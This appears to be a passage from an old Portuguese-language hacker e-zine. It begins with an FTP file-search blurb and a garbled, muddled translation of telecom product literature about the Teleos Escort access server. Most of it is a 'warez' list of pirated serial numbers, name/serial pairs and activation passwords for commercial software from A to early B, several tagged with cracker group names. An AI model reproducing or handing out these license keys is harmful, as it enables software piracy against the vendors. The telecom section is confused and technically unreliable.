--------------------Corta

Procura de arquivos em FTP
 
 
Procura Por: 

O negocio aqui e' o seguinte, voce coloca o nome do arquivo que voce quer encontrar e clica no botao SEARCH, dai e' so' esperar que vai aparecer um bocado de diretorios FTP (clicaveis). Voce so' precisa ir clicando para baixar o arquivo !!


-------------------------Corta <><><><><><><><><><><><><> 12-)))))))SeGUrACçA(((((((-12 Servidor de acesso, A procura da chave? Sistema Teleos Escort OBS: Sempre me refiro ao TELEOS com tele. NOTA: ALAVANCA DIGITAL é tb conhecida como Switched Digital. O servidor é Customer Premises Equipment (CPE) colocado na posiçao formal ocupando um T1 multiplexor. O servidor e uma alavanca esta simultaneamente acessa 23 64 kbps no canal B em interface PRI. O tele servidor foi designado para adicionar alavancas de acesso para estas emergirem em alavancas digitais na rede de serviços. especifique a interface dos cartoes e estes adicionam para o servidor um o tipo de acesso. Por fim precisa de provisao nos canais T1 entre ice, data, image, e video conferencia. Currentemente a interface das redes estao em T1 e PRI em todo formatos de protocolo usado as interfaces estao avaliadas em T1, PRI, BRI, IBM Um tele acesso servira apenas um ponto da alavanca digital twork acesse pelo server. Outros PBXs estarao conectando para o acesso via interface T1. Um IBM 3174 controlara e um estaçao de trabalho sera atacada pelo Token Ring. Todo acesso será com exceçao do local da voz e o DATA será via PRI. CICS aplicaçoes um Inventario, Princing, Payroll, etc. Irá sobre um IBM series 1 processor. A serie 1 e Token ting conectará para um modem acessando a 9.6 Kbps com acesso em SDLC. Para um IBM 3090 host processor. Para verificaçao de cartoes de credito em negocios estara diretamente a Series 1 no qual acessa para o host. Uma chave aplica no drive da rede de trabalho involto em uma imagem transferida , na qual tera a presença de uma alta resoluçao de imagem para o assistente no seleçao de estilos e cores para fazer a avaliaçao das bibliotecas. A imagem pode residir sobre o arquivo do server ou no mainframe em data center. Eles estao acessando usando um pc de alta resoluçao com uma interface gráfica. No outro o tempo do setup no call é IAP6000 Acess Server em poucos dois segundos. O IAP6000 Acess Server e data center um Token Ring interface sobre e conectado na rede quando acabar um acesso direto PRI para MCI's DMS-250. Tele comunicaçao tera esta usado alavancas digitais de serviço dedicadas a T1 e salva cerca 27% de recursos na rede de trabalho em um mês de operaçao NOTA: Tele, sempre associado com um software de rede de trabalho (NSA), é para anunciar a viabilidade de um Pc-based 3270 aplicado em um emulador. Este produto e compativel com IBM's novos 3174 equipados com controles de estabilizaçao e adaptado a (BRI) Basic Rate Interface. Interface das Alavancas O tele é primeiramente um Rate Interface Terminal Adapter (PRI TA) neste você terá a força da alavanca digital da rede para acessar variando em high-speed nas alavancas de serviço. Este inclui AT&T ACCUNET Switched Digital Services (56, 64, 336, e 1536kbps), MCI Vnet alavancas 56, e U.S Sprint VP 56. O tele unicamente voce vai para dial up da rede vc acessa quando precisar resultara em uma reduçao nos custos da transmisao, isto é feito e Escort idealmente da aplicaçao uma video conferencia. O Escort suporta dual standart RS366 dialing interfaces esta vc acessara direto na capacibilidade dos videos codes. O Ecort apenas prove uma interface para serial, sincronizando o host communicator via dual V.35 ou dual RS449/RS530, Este usa os codigos do KEYPAD podera ser mais fácil estabilizar a video conferencia com um remote video codec. As opçoes do Escort incluem T1 chanel Sevices Unit (CSU), no qual a conexao direta para a linha T1 sem um equipamento adicional externo, e um Multi-Chanel Sychronization, no qual prove uma paridade para 56/64 Kbps channels para n X 64. Apenas coloque, o Escort voce linka para customer e estrategic partner na Alavanca Digital da rede com a flexibilidade, custo beneficio. Combinaçao Privado & Publico em redes de serviço Teleos Acess Server da corporaçao final ao user "melhor que velhas palavras". Virtual Private Networks (VPNs) e Hybrid Private Network (HPN). Estas redes dao serviço avançado abaixo de mais flexibilidade e custo-efetivo publico nas alavancas digitais das redes de serviço. Este emerge na rede em pequenos e medios negocios, em grandes corporaçoes para uma grande escolha de serviços alavancas para intra e inter-enterprise nas aplicaçoes da rede. Entre várias redes de trabalho vitual avançadas IAP6000 Acess Server é um multi-point. Token Ring LAN distribuia a imagem comunicaçao, serviços de video conferencia, intra/inter-bulk file transfer, e mulyi-vendor PBX interconexao. Tem muito mais coisas sobre as alavancas digitais e protcolos mais se eu for enfiar tudo de uma vez com certeza nego vai se ambananar eu tenho que admitir que este texto esta um tanto quanto confuso se vc o ler com atençao da para retirar muita coisa na proxima tem mais sobre segurança onde vou trabalhar mais sobre protocolos e um pouco mais sobre alavancas. Mas para que saber isto? Simples sem isto vc nao entende de protocolo e sem protocolo vc nao sabe de nada. É igual aquela historinha lá de cima onde eu falei tem gente que acha que as linhas de comando dos programas que eu coloquei nao servem para nada mas na verdade estas linhas e o funcionamento de seus respectivos programas e que refletem o que vc realmente vc ou eu no caso realmente sabem. <><><><><><><><><><><><><> 13>>>WaREz<<<13 Colocamos uma nova lista de warez desta vez bem mais completa mas como ela é enorme vamos colocar por partes nesta ediçao tem as partes de A ate C. A A-10 Attack 1.1 : 1523995795 A3E v1.x (edit A3E.KEY) : line #1: REGNAME=The Bozo Construction Company line #2: BDA665A818566AB141A665B537566A29 Aaron 1.1.3 : Keep the Return key pressed during the computer boot up. That will register Aaron, any version. Abacus Law Office Calendar System : s/n: F4904 ABC FlowCharter v3.0 for Windows : s/n: 0601001053909501 or s/n: 0601001008295501 ABC ToolKit v1.0 for Windows : s/n: 01103158901 ABC ToolKit v1.1 for Windows : s/n: 1001001103158901 AboutFace 1.3 : 1022446 Above Disk+ v4.0a : s/n: 506824 Abuser v0.8b : name: me s/n: 14644 Accelerated-X 2.1 (Linux/BSD) : 112955 Accelerator : A300-11114-CP4U A300-12935-CP4U A300-31239-CP4U Accent Express for Windows(95) : s/n: 064201130459806 Accent for Windows : s/n: 042807358902273 Accent Products (All) : s/n: 287465810896465 Accent Professional v2.0 for Windows(95) : s/n: 062202100002277 Accent Professional v2.0 for Windows(95) (2) : 064201130459806 Accent v2.0 Final Beta for Windows : s/n: 12345678900012 Access PC 3.0 : 0120 0000 0253 0278 0120 0000 4589 1115 Accountant Inc. Pro : 18225 Accounting Works (one write plus) : s/n: 20.11A1111 AccPac Simply Accounting v2.0a for Windows : s/n: 1021602-48016 Accutext 2.0 : 10900016 ACDSee +v1.30+7 for Windows : name: kermu s/n: 2067038799 or name: mARQUIS s/n: 142441610 ACDSee Beta 6-10 or v1.0+2 for Win95 : name: letis s/n: +tHE riDDLER [uCF] 213111 ACDSee v1.30 for Windows(95) : name: kermu s/n: 213208680 or name: mARQUIS s/n: 120530089 Aces of the Deep : s/n: 8563441101743 Acrobat 2.0 (mac) : ANW200U3010000-353 Action WorkFlow Analyst for Windows : s/n: AA200013001W1001823 Adaptec EZ-SCSI v3.03 for DOS and Windows : s/n: 492848-01 AdCADD Auto Architech for AutoCAD 12 : s/n: DAAHE 20104 Add Impact : s/n: 3009034001 AddDepth 2.0 : AD-200-1-6501-54924 AD-200-1-1764-42848 AddDepth v1.0 for Windows : s/n: AW-100-1-2716-52987 AddDepth v1.1 for Windows : s/n: AW-110-1-1701-30232 Addepth for Windows : AW-100-1-2716-52987 Address Book v1.5 : s/n: JLJ4EVR Address Mate v2.12 for Windows : s/n: AM212101704 Address Wijzer v3.10 : s/n: AD38170 Adept BBS +v1.07 for OS/2 : name: Creeping Death Reg. s/n: 3599887846 Rego Serial No: 806949176 Adept BBS +v1.07 for OS/2 (2) : name: Undemon Reg. s/n: 3484233081 Rego Serial No: 808001375 AdoBe Acrobat Capture v1.0 : s/n: WCW100R3101909-171 Adobe Acrobat Distiller 2.0 : MDW210P7154748-899 or ANW200U3010001-986 AdoBe Acrobat Distiller PE : s/n: WAW210P7121183-537 Adobe Acrobat Distiller v1.0 for Windows : s/n: DEE100R3001172-010-496 AdoBe Acrobat Distiller v2.0 for Widdows : s/n: WAW210P7121183-537 AdoBe AcroBat Distiller v2.1 for Windows : s/n: DEE100R3001172-010-496 AdoBe Acrobat Distiller v2.1 PE : s/n: WAW210P7121267-246 Adobe Acrobat Exchange 2.0 : MVW200R3100411-609 or MVW100R3100000-050-208 or DEW100R3100564-885(50 User) Adobe Acrobat Reader v1.0 for Dos : s/n: ARD100R3600000-830 AdoBe Acrobat Reader v1.0 for Windows : s/n: ARW100R3100000-500-574 AdoBe Acrobat Reader v1.2 for Windows : s/n: ARM100R3100034-100-397 AdoBe Acrobat v1.0 for Windows : s/n: ARW100R3100230-826 AdoBe Acrobat v2.0 for Windows : s/n: WVW200R3100221-398 or WVW200R3110509-339 or WVW200R3110509-334 Adobe Acrobat WorkGroup 2.0 : DEW200U3100000-010-974 or DEW200U3100001-010-607 or DEW200U3100002-010-240 AdoBe Illustrator v4.0 for Windows : s/n: ABW400R3101335-714 or ABW400R3106248-986 or ABW400R3101991-252 Adobe Illustrator v4.0.3 for Windows : ABW4033200000-719 AdoBe Illustrator v4.01 for Windows : s/n: ABE400R3001625-858 AdoBe Illustrator v4.03 for Windows : s/n: ABW4003106248-986 Adobe Illustrator v4.1 for Windows : s/n: ABW4003109249-420 AdoBe PageMaker v5.0a for Windows : s/n: 03-5025-303224614 AdoBe PageMaker v6.0 for Win95 : s/n: 03-3002-000062275 or s/n: 03-5025-303224614 or s/n: 03-4004-100486078 AdoBe PageMaker v6.0 for Win95 (2) : s/n: 03W600R1118753-720 or s/n: 03W600R1124621-479 or s/n: 03W600R1118669-742 Adobe PhotoDeluxe v1.0 for Windows 95 : s/n: HTW100R7106474-426 or s/n: HTW100R7108267-350 AdoBe PhotoShop : s/n: PCA 100000100-953 or s/n: PDA 100001185-501 or s/n: PDA 100001517-722 AdoBe PhotoShop v2.5 for Windows : s/n: PWW250R3000000-880 or s/n: PWW250R3001422-135 AdoBe PhotoShop v2.5.1 for Windows : s/n: PWW250R3107069-312 or s/n: PWW250R3104501-684 or s/n: PWW250R3000406-282 Adobe Photoshop v3.x 5 user license : PWW300U3100000-005-285 Adobe Photoshop v3.x for Windows : PWW300R3000011-926 Adobe Photoshop v4.0 : s/n: PWW250R3107069-312 AdoBe Premiere v1.0 for Windows : s/n: MBW100X3100970-389 or s/n: MBW101B3105866-803 AdoBe PreMieRe v1.1 Video Editing for Windows : s/n: MBW100D3100371-512 or s/n: MBW101X3100132-284 Adobe Premiere v4.0 for Windows : s/n: MBW400R11093940244 AdoBe Premiere v4.2 for Windows : s/n: MBW400R1104198-375 or s/n: MBW400R3900106-762 or s/n: MBW400R1109912-312 or MBW400R1109912-436 . AdoBe Premiere v4.2 for Windows (2) : s/n: MBW400R1109394-244 or s/n: SPW250R3163390-352 or s/n: MBW100J3100384-488 Adobe Premiere v4.2 for windows (3) : s/n: MBF420U3000205-940 AdoBe StreaMLine v3.0 for Windows : s/n: SBW3001110706-297 AdoBe StreaMLine v3.01 for Windows : s/n: SBW300S1100640-184 Adobe Type Manager v4.0 for Windows 95 : s/n: AWW400P0101591-292 AdoBe Wild Type : s/n: FHW251R31003373 Adres Wijzer v3.10 from Davilex : s/n: AD38170 Advaced Wire EDM v7.1 : s/n: 98730105 Advanced Fabrication v4.0 : s/n: 98861822 AfTer Dark +v3.0 for Windows : s/n: ADW-00670-6681 or s/n: ADW-33671-7328 or s/n: ADW-33671-7329 AfTer Dark +v3.0 for Windows (2) : s/n: DSW-36523-5758 or s/n: KAW-64331-1262 After Dark 3.0b (mac) : ADM-00670-6681 After Dark Disney (mac) : DIS-00670-6681 After Dark Loony Tunes (mac) : ZQA-35600-2587 After Dark Marvel (mac) : EAM-30306-9708 After Dark Scream Saver (mac) : SSM-75689-8965 After Dark ScreenSaver - Disney Edition : s/n: DSW-93093-5071 or s/n: DSW-36523-5758 or s/n: DSW-30857-2768 or s/n: DSW-35515-8984 After Dark ScreenSaver - Loony Toons Edition : s/n: ZQA-35600-2587 After Dark ScreenSaver - Marvel Comics Edition : s/n: MVW-92958-1201 After Dark ScreenSaver - Star Trek Edition : s/n: BSN-90011-7479 or s/n: SPW-06753-8181 After Dark ScreenSaver - Star Trek: StarDate : s/n: ESW-83838-9710 or s/n: LSW-83838-9710 After Dark ScreenSaver - Star Trek: The Next Generation : s/n: BSW-35600-2587 or s/n: SPW-06753-8181 or s/n: BSW-73040-8903 After Dark ScreenSaver - The Simpsons Edition : s/n: ZQW-33671-7329 or s/n: ZQW-35600-2587 or s/n: KAW-64331-1262 After Dark ScreenSaver - Totaly Twisted Edition : s/n: BII-00670-6681 After Dark ScreenSaver - X-Men Edition : s/n: AD3-00670-6681 After Dark Simpsons (mac) : ZQM-65187-4617 After Dark Star Trek (mac) : EAM-30306-9708 After Dark Star Trek Posters (mac) : SPM-90213-6771 After Dark Star Trek:TNG (mac) : ZQM-35600-2587 After Dark Totally Twisted (mac) : TTT-00670-6681 After dark v3.0 for Windows 2 : ADW-33671-7329 After dark v3.0 for Windows 3 : DSW-36523-5758 AfTer Dark v3.2 for Windows 95 : s/n: ADC-32659-7016 After Dark X-Men (mac) : ZQM-65187-4617 After Effects 3.0 : EMW00000000001-345 AgenCy DataBase v1.12c for Windows : s/n: ADW00195 Agent 99b : N2CJAHZ8-9CVHRJ3M-26YPLZ8L-BGGD44DT-1EA6CC62 Agent 99d : s/n: m2cjahz8-9bvhrj3m-26xplz81-bfgd44ct-lea6bc82 Agent 99e : WH6W83Y5-HVWMSDK9-MXWJCYA2-9MHLRBSK Agent 99e 32-bit : WH6W83Y5-HLVB6LZG-GGF3AKE9-4PAGUZB9-G5WH4SLN Agent 99e 32-bit (2) : s/n:WD6VZ3HP-WGS8Z494-DLKVF5AY-GN1RZ6T2-2LTWGRWS-ZMT92YH3 Agent 99f 32-Bit : s/n:MKK6BXZC-95XZVF5S-STHFS6DJ or s/n:JYJ13VTV-6HXSBZFE-VFG2EKKW Agent 99F/xx-bit bld.299 : JYJ13VTV-6HXSBZFE-VFG2EKKW-JYJ13VAV or 2SMVK8FL-H8KPLZ4E-FWJ6PFRC-HGNVNPX5 Agent 99g : 6CZCYPMK-VYB3974P-91V7SCTK or JYJ13VTV-6HXUBZFE-VFG2EKKW AgentDA 2.1.3 : 179105018 AgFa FotoFlow : s/n: 410210021-086 agSI +v1.1.4 for Dos : name: Me! s/n: HHNOAJKC or name: You! s/n: HVHUIFOQ agSI +v1.1.4 for Dos (2) : name: 2U! s/n: QHEXAATC or name: 4U! s/n: SHCZAYVC agSI +v1.1.4 for Dos (3) : name: SoMeBoDy! s/n: WIFWZUBC or name: NoBoDy! s/n: LHJQJISO agSI +v1.1.4 for Dos (4) : name: Xxx! s/n: FHVWGRCS or name: CYBERPUNK s/n: FMPMVLOC agSI +v1.1.4 for Dos (5) : name: Andreas Groegel s/n: MSJXAAORG or name: TeLLeRBoP s/n: MPONSERC agSI v1.1.4 for Dos : name: Me! s/n: HHNOAJKC Aladdin Desktop Tools 1.0.1 (mac) : ADTB-778-010000 Aladdin Desktop Tools 1.0.x : ADTE-777-455225 or ADTH-619-131366 or ADTK-761-463014 Alarming Events : 3478 Albatross CD-player for OS/2 : name: Doh Enterprises or s/n: 3013757502 Aldus FreeHand v3.0 for Windows : s/n: 03-4002-200194196 Aldus FreeHand v4.0 for Windows : s/n: 05-4002-202558479 Aldus Freehand v4.0 for Windows (2) : 03-003-00003 and 03-921-34311 Aldus FreeHand v4.1 for Windows : s/n: 10140-0228-0075-33280 Aldus Freehand v5.0 for Windows : s/n: 10350-0276-0089-83911 or s/n: 10350-0874-0288-69455 or s/n: 10350-0313-0097-58368 Aldus Freehand v5.5 (mac) : 10255-0397-4374-13083 Aldus Freehand v7.0 : s/n: FWH700-70812-27097-26570 Aldus Freehand v7.0 for Windows : s/n: FWH700-70812-27097-26570 Aldus GaLLeRy Effect v1.0 for Windows : s/n: 36-0015-000048418 Aldus GaLLeRy Effect v1.5 for Windows : s/n: 36-1500-040049293 Aldus Gallery Effects v1.5 for Windows : 36-1500-040049293 Aldus PageMaker v4.0 for Windows : s/n: 02-3008-000036469 or s/n: 02-4008-200010087 or s/n: 02-6023-000345263 Aldus PageMaker v5.0 for Windows : s/n: 02-50C8-100094310 or s/n: 03-4044-100461903 Aldus PageMaker v5.0 for Windows (2) : s/n: 03-5007-201735504 or s/n: 03-4005-200136599 Aldus PageMaker v6.01 for Windows : s/n: 03-4001-201347950 Aldus Persuasion v2.1a for Windows : s/n: 09-2101-200613117 Aldus Persuasion v3.0b for Windows : s/n: 09-3003-202849134 Aldus PhotoStyler v2.0 for Windows : s/n: 15-0208-202162221 or s/n: 15-11A7-100552167 or s/n: 15-0206-202022990 Aldus PhotoStyler v2.0 for Windows (2) : s/n: 15-2000-385213980 or s/n: 15-1115-201108382 Aldus PhotoStyler v2.0 for Windows (3) : s/n: 15-2008-201748321 or s/n: 15-2000-000000000 Aldus PhotoStyler v2.0 Special Edition for Windows : s/n: 15-0201-201632890 or s/n: 15-0217-202691782 Aldus Type Twister v1.0 for Windows : s/n: 46-1000-000031664 Aldus/Adobe Pagemaker NL v5.0 for Windows 4 : 03-5025-303224614 Aldus/Adobe Pagemaker v6.0 : 03-3002-000062275 Alibaba v2.0 WEB Server for Windows 95/NT : Activation Code: {$nD#N'-3i*9@ s/n: 00000485 AllFix v4.16 : name:The GuaRDiaN aNGeL s/n:329270000CE650D2A0FDD78B or name:TeLLeRBoP s/n:D619A6A3F9015C5430B61F33 . AllFix v4.16 (02) : name: You! s/n: 473404F51350F5A87343C030 or name: Me! s/n: AEA94F395097FD5AB299CC78 AllFix v4.16 (03) : name: Nobody s/n: 5C32A17E1675E3CE7533CED1 or name: Somebody s/n: B207435FB750CB1B032AB14E AllFix v4.16 (04) : name: Who? s/n: BD6EAE60930661AEAD870E5E or name: *** s/n: DC498A2D607C919B90E93C1C AllFix v4.16 (05) : name: 2U! s/n: B19AB7550452C7CC0A4044EC or name: 4U! s/n: BC1DED8724AB1AF28AC1F90E Allfix v4.16 (06) : name: Somebody s/n: B207435FB750CB1B032AB14E Allfix v4.16 (07) : name: Who? s/n: BD6EAE60930661AEAD870E5E Allfix v4.16 (08) : name: *** s/n: DC498A2D607C919B90E93C1C Allfix v4.16 (09) : name: ??? s/n: 1A4277E1EFDC6B8B508A7B6D Allfix v4.16 (10) : name: --- s/n: EDA9D2A19E73618C3FCAD262 Alliance ScreenSaver for Windows and MAC : s/n: 09-980943 ALLright Utilities 1.0 : 1026439 Almanac +v3.5c for Windows/95/NT : regname= THE RIDDLER [EOD] s/n: B9068287 or regname= TwinHead [TWH/UCF] s/n: A9261579 Almanac +v3.5c for Windows/95/NT (2) : regname= TwinHead [TWH/UCF] s/n: B1775915 or regname= Crack da WareZ s/n: A1052039 Almanac 3.5c for Win95/NT : name:Crack da WareZ s/n:A1052039 Almanac v3.5 WIN : name: TwinHead [TWH/UCF] s/n: A9261579 Almanac v3.5c for Windows/95/NT : name: THE RIDDLER [EOD] s/n: B9068287 ALMANAC V3.x THE RIDDLER [EDD] : 89068287 Alone in the Dark I CD : s/n: 11 0831 3461 Alpha Five : sn/Z50NR1U1-1014154 rn/368443 Alpha Five for Windows : Serial Number: Z50NR1U1-1019144 Registration Number: 368443 Alpha Five for Windows (2) : Serial Number: Z50NR1U1-1014154 Registration Number: 368443 Alpha five home/business ed. v1.0 Win : Z50HBEV1-1019144 Alpha Five v5.0 for Windows 95 : SFR-051864 Alpha Four 3.0 : M3DS5000-3089735 Alpha Four v3 Discovery Edition : M30DSNS3-3155345 Alpha Four v4 : A40UGSU1-5006601 Alsoft Power Pack 1.0.7 : PO017018 PS001604(001) Altamira Composer Pro v1.1 : s/n: 644 043 060 0036 AlTos System Diagnostic v1.0SO : s/n: DIAG7K_9K00004 AlTos System ECU Setup v1.1SO : s/n: A_ECU00246 AM Workflow v3.1 : 001169 AM WorkFlow v3.1 for Dos : s/n: 001169 AmeRica OnLine v1.0 for Windows : s/n: 69-2815-4880 Password: LARKED-MASSES America online v1.15 for Windows 3/1 : s/n: 48-5004-6750 password: AMBLED-ANION AmeRica OnLine v2.0 for Windows : s/n: 79-0519-3782 Password: SWIMS-TAGGER AmeRica OnLine v2.5+4 for Windows : s/n: 10-5932-0206 Password: GOBLET-MEDIAN America Online Ver 3.0 50 hrs. : s/n: 3E-4835-8961 Password: GLEEM-TUNERS AmeRica OnLine v3.0 for Windows : s/n: 3s-8319-7222 Password: FEVER-DRAMAS AmeRican Heretic Dictionary : s/n: 38321584 American Heritage Dictionary : 36688919 American Heritage Dictionary 3.0 : A9-L0010M3 or A9-D0010M3 Andromeda 3D Series II : 5M30400120-0441 5M20304526-3390 0P20000000-0051 3m20900414 Animation Stand 2.0.2 : 201063 or 202012 Animation Works : 45482 Animation Works Interactiv v2.0 : s/n: 3001162627 Animator Pro : s/n: 4930-P4-PH-1 Animator Pro v1.0 : s/n: 01603-010203-2520 Animator Pro v3.05 : s/n: 655-10000088 AniPaint Animator v8.0 for Windows : s/n: FSWR00LZ Anne Hooper's Ultimate Sex Guide : CD Access Code: 3746 AnsiPaint +v2.3 for Dos : name: DIR&MIR s/n: 1216 or name: THE RIDDLER [EOD] s/n: 13872 Ansipaint v2.1 : name: DIR&MIR s/n: 1216 Ansipaint v2.3 : name: THE RIDDLER [EOD] s/n: 13872 Answering Machine/2 for OS/2 : name: DoH Enterprises s/n: 28585135 Anubis 2.54 : 9611181 AnyTime v3.0 for Windows : s/n: YX0550011976 AnyView v1.00a for Windows : s/n: AVR-100-4201975 AOL v2.5 beta 4 : s/n: 10-5932-0206 p/w: GOBLET-MEDIAN App-Doc Linker : 817GrGn5jkfh78h Apple Media Tool v1.2 for Windows : s/n: AMT00-00000-2155073 Apple Network Administrator Toolkit : 1000004123 AppleShare File Server 4.x : B-341-UFD-170-QEC-309-IBZ-461-QYV-340 or B-341-UFD-170-QEC-309-ICJ-348-VZJ-340 Application Control v2.xx : name: THE RIDDLER s/n: 628872953 Approach v3.0 for Windows : s/n: 1F00028-01104360 AR8000 Toolkit 1.1.1 : AR1020RBYOFWQRMH0HCOY Arcada Backup Exec v7.01A Enterprise Edition for NetWare : s/n: 0736630000014869 Archive Converter v3.x : s/n: 1317660001 to 1317669999 Archiver Converter v3.11 : s/n: 131766???? ArcServe v5.01 for Windows (10 users) : s/n: 10AS 1163609 ArcServe v5.01g Windows Edition for Netware : s/n: 0392181 ArcServe/386 v3.0b for Dos : s/n: 23014 or s/n: 23350 ArcSolo v3.02 for Windows : s/n: EVSO 1231464 or s/n: 302SO 1246936 ArcTest v2.3a : s/n: 18624809 name: TwinHead [TWH/UCF] ArcTest v2.3a -Archiver Test Processor- : name: TwinHead [TWH/UCF] s/n: 18624809 ARJ v2.41 : name: XXX s/n: 12345 ARJ v2.41 (2) : name: MGE s/n:1234-13001 05851 ARJ v2.50a : name: The GuaRDiaN aNGeL s/n: 12345678-0x18A33E08 or name: TeLLeRBoP s/n: 12345678-0x5AF807EE ARJ v2.50a (2) : name: Me! s/n: 12345678-0x924A0CFE or name: You! s/n: 12345678-0xF4C49F2C ARJ v2.50a (3) : name: 2U! s/n: 12345678-0x29C8E662 or name: 4U! s/n: 12345678-0xD10AADD4 ARJ v2.50a (4) : name: BoyWonDer s/n: 12345678-0x3DBAF82C or name: Rann Lee s/n: 12345678-0xB63394E7 ARJ v2.50a (5) : name: SoMeBoDy! s/n: 12345678-0xEF4E1530 or name: mARQUIS [uCF] s/n: 91919191-0xACE93251 ARJ v2.50a (6) : name: TEST s/n: 12345678-0xB8EB2DAF ARJ v2.50a (7) : name: ARJ s/n: 951224-0xA1CF9A43 Armor Alley 1.1 (mac) : EXC53RH Arrange 2.0 : CWC144NG Arrange-It 1.0.2 : ARM9300533 Art & Letters v4.5 : s/n: 464412 Art Apart Collectors Edition for Windows : s/n: 2311-0021-3285 Art Mixer 1.6 : 9208001 AskSam Pro v3.0 for Windows(95) : s/n: 300-64646-96012 Asset DocParts v1.0 for Windows : s/n: ADP010-200-0000 Astound +v2.1 for Windows(95) : s/n: 3044507372 Astound 2.0 : 3006005109 or 3004400378 Astound v1.5 for Windows : s/n: 3031620659 Astound v2.0 for Windows : 3044507372 Astound v2.1 for Windows(95) : 3044507372 Astro World for Windows : name: Crack da WareZ s/n: @JTJ66BHNW AsyMeTrix 3D F/X for Windows : s/n: 2011-009713 AsyMeTrix MultiMedia Toolbook v3.0 : s/n: 0740-002379 Ataman TCP Remote logon services v1.6 for WinNT : name: Misha [UCF] s/n: i4b364652 (Register.exe tcpservers "Misha [UCF]" i4b364652) Atlantis Render 2.11 : 040412-486921-226001 ATM 4.0 Deluxe : AWW400R7110870-808 ATM Deluxe 4.0x : CIB00000000001-999-266 or CIB00000000002-999-899 or CIBXBKWM000001-999-17 Atticus Vista 1.0 : 126100023 AudioShop 2.0.1 : 514.200.00016351 AudioTrack 1.0 : 60031ATTA4409 Authorware Pro 3.0 : 20030-0979-1236-56383 AuthorWare Pro v2.0 for Windows : s/n: 8205-2072-3071 AuthorWare Pro v2.01 for Windows : s/n: 8217-4072-0086 AutoBoot 1.5.4 : Registered: 299999910380596 AutoCad Data Extension : s/n: 130-10083217 Autocad lite for Windows : 167-10001908 AutoCad LiTe v2.0 for Windows : s/n: 160-10124811 or s/n: 167-10001908 AutoCAD R12 : 110-10638231 AutoCad v12.0 for Dos and Windows : s/n: 110-10061620 or s/n: 110-10509227 AutoCad v13.0 for Windows : authorization s/n: 70FEE2FD AutoCD v1.7.4 for Windows(95) : name: Misha compa: [UCF] s/n: 66VVOSJG AutoDesk Animator Pro : s/n: 4930-P4-PH-1 AutoDesk Animator Pro v1.0 : s/n: 01603-010203-2520 AutoDesk Animator Pro v3.05 : s/n: 655-10000088 Autodesk Autocad ADE extension : 13010083217 Autodesk Autocad data extension : 130-10083217 Autodesk Autocad lite for Windows : 167-10001908 Autodesk Autocad v.R12 : 110-10061620 Autodesk Autocad v13.0 for Windows : 70FEE2FD AutoDesk Designer Learning Resources : s/n: 07301-010203-4520 AutoDesk Designer New Fundamental Tools : s/n: 07300-010203-3310 AutoDesk Designer Training Guide : s/n: 07300-010203-3010 AutoManager v1.1 for Windows : s/n: 001454 AutoMap Pro v1.06 for Windows : s/n: 2028038 or s/n: 4553552 Automap PRO v1.06 for Windows (2) : 4553552 AutoMap Road Atlas v4.0 for Windows : s/n: 34584-068-0102477 AutoMap v1.0 for Windows : s/n: W 12391 AutoMenu v1.0 for Kids : s/n: 501G4-UHPMH-PCG53-S or s/n: 10114-UXUDH-UL15E-G AutoMenus Pro 3.x.x : Anonymous 45011585 AutoScribe v2.5 : bbs: G.!.$ s/n: 5736 or bbs: You! s/n: 5808 or bbs: Me! s/n: 5789 or bbs: NoBoDy! s/n: 5927 AutoScribe v2.5 (2) : bbs: byMMi s/n: 5902 or bbs: Xxx! s/n: 5798 or bbs: 4U! s/n: 5738 or bbs: SoMeBoDy! s/n: 6001 AutoScribe v2.5 (3) : bbs: ???! s/n: 5699 or bbs: 2U! s/n: 5738 or : bbs: Nope s/n: 5863 or : bbs: ???? s/n: 5699 Autoscribe v2.5 (4) : bbs: ABC s/n: 5804 or bbs: Somebody s/n: 6001 or bbs: Nobody s/n: 5927 Autoscribe v2.5 (5) : bbs: You s/n: 5808 or bbs: ???? s/n: 5699 or bbs: Me s/n: 5789 AutoSketch v2.0 for Windows : s/n: 123-12345678 or s/n: 190-00001903 or s/n: 190-00007909 AutoSketch v2.0 for Windows (2) : s/n: 190-00019039 or s/n: 190-00028490 AutoSketch v2.10+ for Windows : s/n: 190-00028490 Autosketch v2.x for Windows : 190-00028490 or 190-00001903 AutoSketch v4.0 for Windows : s/n: 20-107832 AutoVision v2.0 for Windows : s/n: 5B35AE2B AutoVue Professional v1.22C3 for Windows : s/n: 311-076-0001605-01 AutoVue Professional v12.2 for WIndows : s/n: 111-300-0000020-71 AutoWinNet v1.3 for Windows : s/n: AWN348CASLT101 AutoWinNet v1.4 for Windows : s/n: AWN348INWUA102 AutoWorks : s/n: G037825 AVM-ISDN-IBTX v3.0 : s/n: 2001507A AWARD +v4.50pg (Bios) : password: AWARD_SW Axis Game Cheater 1.0.1 (mac) : GC100/30728/02381QI Axis Game Cheater 2.0 : 5020000000176 AXis, the game cheater, from QuaterDeck : s/n: 001-17D-67933 or s/n: 133-624-39992 or s/n: 101-671-09990 AXis, the game cheater, from QuaterDeck (2) : s/n: 001-37E-52722 or s/n: AP100-1633-31011-JG or s/n: AP100-31011-0170-EV AXS OnLine Reader 1.0.3 (mac) : TNJFDC AXS OnLine Reader 1.0.x : Y7CJGE or YBXT27 or Y49G74 B BackBurner (mac) : 03-1489-0280 BackBurner 2.6 or 3.1 : 22-9033-8680 22-9043-5686 22-9063-2682 22-9073-9678 22-9093-6674 22-9014-3670 BackUp Exec EnterPrise Edition : s/n: 0-5-343-0-000-6-031689 BackUp Exec EnterPrise Edition v6.1 for WindowsNT : s/n: 0-5-425-5-000-0-010207 BackUp Exec EnterPrise Edition v7.01 for Novell NetWare : s/n: 0-1-362-9-000-9-010101 Backup Exec for Novell Netware Enterprise Edition : 0-3-371-8-000-8-014689 Ballade v1.0 for Windows : s/n: 2004100460 Bandwidth Buster 32 : Name: Nobody s/n: 0AKEHMWN7FA44TEHV4YF Banner 3 : s/n: 507230300326 Bar Code Pro UPC 1.0 (mac) : 230,780,677,334,210 (# of bar codes used in the US) Barclock v4.1 : Name: tHATDUDE s/n: ZVDTH-00WEM Batch It! 1.0 : 53060XXXXX (x=Any Char) Batch converter : 130-0001302-265500 BBS Bowl +v1.7 : name: The GuaRDiaN aNGeL s/n: 18384 or name: TeLLeRBoP s/n: 17684 BBS Bowl +v1.7 (2) : name: NoBoDy! s/n: 18278 or name: ????! s/n: 12163 BBS Bowl +v1.7 (3) : name: You! s/n: 19689 or name: 2U! s/n: 13250 BBS Bowl +v1.7 (4) : name: Me! s/n: 17577 or name: Xxx! s/n: 20488 BBS Bowl +v1.7 (5) : name: 4U! s/n: 13452 or name: SoMeBoDy! s/n: 18583 BBS Bowl v1.5 : name: Batman s/n: 15766 or name: ??? s/n: 